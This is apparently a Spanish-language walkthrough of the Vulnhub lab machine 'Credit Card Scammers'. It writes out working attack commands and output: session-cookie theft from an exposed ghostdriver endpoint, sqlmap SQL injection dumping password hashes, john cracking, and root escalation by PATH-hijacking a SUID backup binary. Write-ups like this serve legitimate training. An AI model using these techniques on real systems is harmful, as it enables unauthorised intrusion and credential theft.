[VLN] Credit Card Scammers

Hoy vamos a hackear la maquina de Vulnhub llamada Credit Card Scammers. Podeis descargarla desde el siguiente enlace: https://www.vulnhub.com/entry/credit-card-scammers-1,479/

Video

Enumeration

Empezamos con un nmap para ver que puertos tiene abiertos.

sml@Cassandra:~$ nmap -A -p- 192.168.1.52 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-13 12:54 CEST Nmap scan report for ppeshop.home (192.168.1.52) Host is up (0.0012s latency). Not shown: 65531 filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.0 (protocol 2.0) | ssh-hostkey: | 3072 8d:0a:3a:42:5f:92:47:69:33:59:b3:77:53:3c:be:73 (RSA) | 256 ab:3d:26:3b:d9:02:50:a4:49:c0:bf:13:75:dc:a5:73 (ECDSA) |_ 256 fb:6a:7e:1b:05:f9:d1:ef:be:dd:ff:39:ed:f5:f5:63 (ED25519) 80/tcp open http Apache httpd 2.4.37 ((centos)) | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Apache/2.4.37 (centos) |_http-title: Your PPE Supplier 443/tcp closed https 9090/tcp closed zeus-admin Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 197.03 seconds

Miramos si el puerto 80 tiene algo mas interesante para mostrarnos...

sml@Cassandra:~$ gobuster dir -u http://192.168.1.52 -w /usr/share/wordlists/dirb/big.txt -x php,txt =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://192.168.1.52 [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirb/big.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Extensions: php,txt [+] Timeout: 10s =============================================================== 2020/05/13 13:04:14 Starting gobuster =============================================================== /.htaccess (Status: 403) /.htaccess.php (Status: 403) /.htpasswd (Status: 403) /.htpasswd.php (Status: 403) /.htpasswd.txt (Status: 403) /.htaccess.txt (Status: 403) /LICENSE (Status: 200) /_admin (Status: 301) /buynow.php (Status: 200) /cgi-bin/ (Status: 403) /class (Status: 301) /css (Status: 301) /img (Status: 301) /noindex (Status: 301) /settings (Status: 301) /vendor (Status: 301) =============================================================== 2020/05/13 13:04:24 Finished ===============================================================

Vemos que tiene el directorio /_admin, al cual si entramos en http://192.168.1.52/_admin/dist nos lleva a una pantalla de login.... Por otro lado, buscamos mas informacion en el puerto 443.

sml@Cassandra:~$ gobuster dir -u http://192.168.1.52:443 -w /usr/share/wordlists/dirb/big.txt -x php,txt =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://192.168.1.52 [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirb/big.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Extensions: php,txt [+] Timeout: 10s =============================================================== 2020/05/13 13:04:14 Starting gobuster =============================================================== /sessions (Status: 200) /shutdown (Status: 200) =============================================================== 2020/05/13 13:04:24 Finished ===============================================================

Vemos que hay un directorio llamado /sessions. Si entramos, podemos ver que es algo relacionado con phantomjs y ghostdriver.... Buscando mas informacion encontramos los comandos integrados en ghostdriver: https://docs.google.com/spreadsheets/d/17PKHWWhOgEFB8Vznju_bB6p9duguo-2NqL9qBgUQ iYE/edit#gid=0

Exploitation

Despues de ver los comandos accedemos a: http://192.168.1.52:443/sessions Podemos ver la sesion-id, la copiamos y vamos a: http://192.168.1.52:443/session/022189e0-95f5-11ea-b7bf-5d93144ae786/cookie Copiamos el "value". Vamos a http://192.168.1.52/_admin/dist/ y con el cookie manager ponemos el "value" que hemos copiado anteriormente, de ese modo al recargar la pagina ya estamos logueados... Vamos a "Database Admin -> Execute" y capturamos la request con Burp Suite. La guardamos como un fichero (hackme.txt). Ejecutamos sqlmap y vemos que el comando command es vulnerable. Miramos las BBDD que hay.

sml@Cassandra:~$ sqlmap -r h --dbs [18:20:06] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0.12 (MariaDB fork) [18:20:06] [INFO] fetching database names [18:20:06] [INFO] fetching number of databases [18:20:06] [INFO] resumed: 2 [18:20:06] [INFO] resumed: information_schema [18:20:06] [INFO] resumed: orders available databases [2]: [*] information_schema [*] orders

Miramos las tablas.

sml@Cassandra:~$ sqlmap -r hackme.txt --dbs -D orders --tables [18:20:10] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0.12 (MariaDB fork) [18:20:10] [INFO] fetching database names [18:20:10] [INFO] fetching number of databases [18:20:10] [INFO] resumed: 2 [18:20:10] [INFO] resumed: information_schema [18:20:10] [INFO] resumed: orders available databases [2]: [*] information_schema [*] orders [18:20:10] [INFO] fetching tables for database: 'orders' [18:20:10] [INFO] fetching number of tables for database 'orders' [18:20:10] [INFO] resumed: 2 [18:20:10] [INFO] resumed: orders [18:20:10] [INFO] resumed: users Database: orders [2 tables] +--------+ | orders | | users | +--------+

Por ultimo, hacemos un dump de la tabla "users".

sml@Cassandra:~$ sqlmap -r hackme.txt --dump -D orders -T users Database: orders Table: users [2 entries] +--------+--------------+------------------------------------------------------- -------+ | userID | userName | password | +--------+--------------+------------------------------------------------------- -------+ | 1 | admin | $2y$1X$A4jqwtWB73.TAMIeplx0T.5oG/mnHR1qTDa8cmtTIvW3ZTjdSjdjC | | 2 | m0n3y6r4bb3r | $2y$12$EX/FDsztTMwftzPRyY8gFuM7ZjAphQRZs88qpZpmboRogOAOYXowC | +--------+--------------+------------------------------------------------------- -------+

Copiamos el password del usuario m0n3y6r4bb3r a un fichero y lo crackeamos usando john y el diccionario rockyou.txt.

sml@Cassandra:~$ nano tocrack.txt sml@Cassandra:~$ sudo /usr/sbin/john tocrack.txt --wordlist=/home/sml/rockyou.txt Using default input encoding: UTF-8 Loaded 1 password hash (bcrypt [Blowfish 32/64 X3]) Cost 1 (iteration count) is 4096 for all loaded hashes Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status delta1 (?) 1g 0:00:07:12 DONE (2020-05-17 19:07) 0.002313g/s 44.64p/s 44.64c/s 44.64C/s greta..blakey Use the "--show" option to display all of the cracked passwords reliably Session completed

Obtenemos la password. Nos logueamos con moneygrabber, es decir m0n3y6r4bb3r pero sustituyendo los numeros por letras.

Low Shell

sml@Cassandra:~$ ssh moneygrabber@192.168.1.52 MONEY MAKER. PLEASE LOGIN. moneygrabber@192.168.1.52's password: Last login: Thu May 14 21:43:28 2020 from 192.168.1.148 [moneygrabber@ppeshop ~]$

Exploramos el sistema y miramos si hay algo interesante.

[moneygrabber@ppeshop ~]$ find / -perm -4000 2>/dev/null --SNIP-- /usr/bin/backup --SNIP--

Vemos que esta el fichero /usr/bin/backup con SUID. Al ejecutarlo, ejecuta tar/mysql.tar, asi que creamos un enlace simbolico de bash con los nombres tar y mysql.tar, exportamos el PATH para que apunte a nuestros enlaces y ejecutamos :)

Privilege Escalation

[moneygrabber@ppeshop ~]$ mkdir bin [moneygrabber@ppeshop ~]$ ln -s /bin/bash bin/tar [moneygrabber@ppeshop ~]$ ln -s /bin/bash bin/mysql [moneygrabber@ppeshop ~]$ ln -s /bin/bash bin/mysql.tar [moneygrabber@ppeshop ~]$ export PATH=/home/moneygrabber/bin:$PATH [moneygrabber@ppeshop ~]$ /usr/bin/backup [root@ppeshop bin]# id uid=0(root) gid=1000(moneygrabber) groups=1000(moneygrabber) [root@ppeshop bin]# cd /root [root@ppeshop root]# ls anaconda-ks.cfg flag3.txt ghostdriver.log [root@ppeshop root]# cat flag3.txt y2zmGeGjrA4dbDj4wBWr

End

Y con esto ya seriamos root de la maquina :)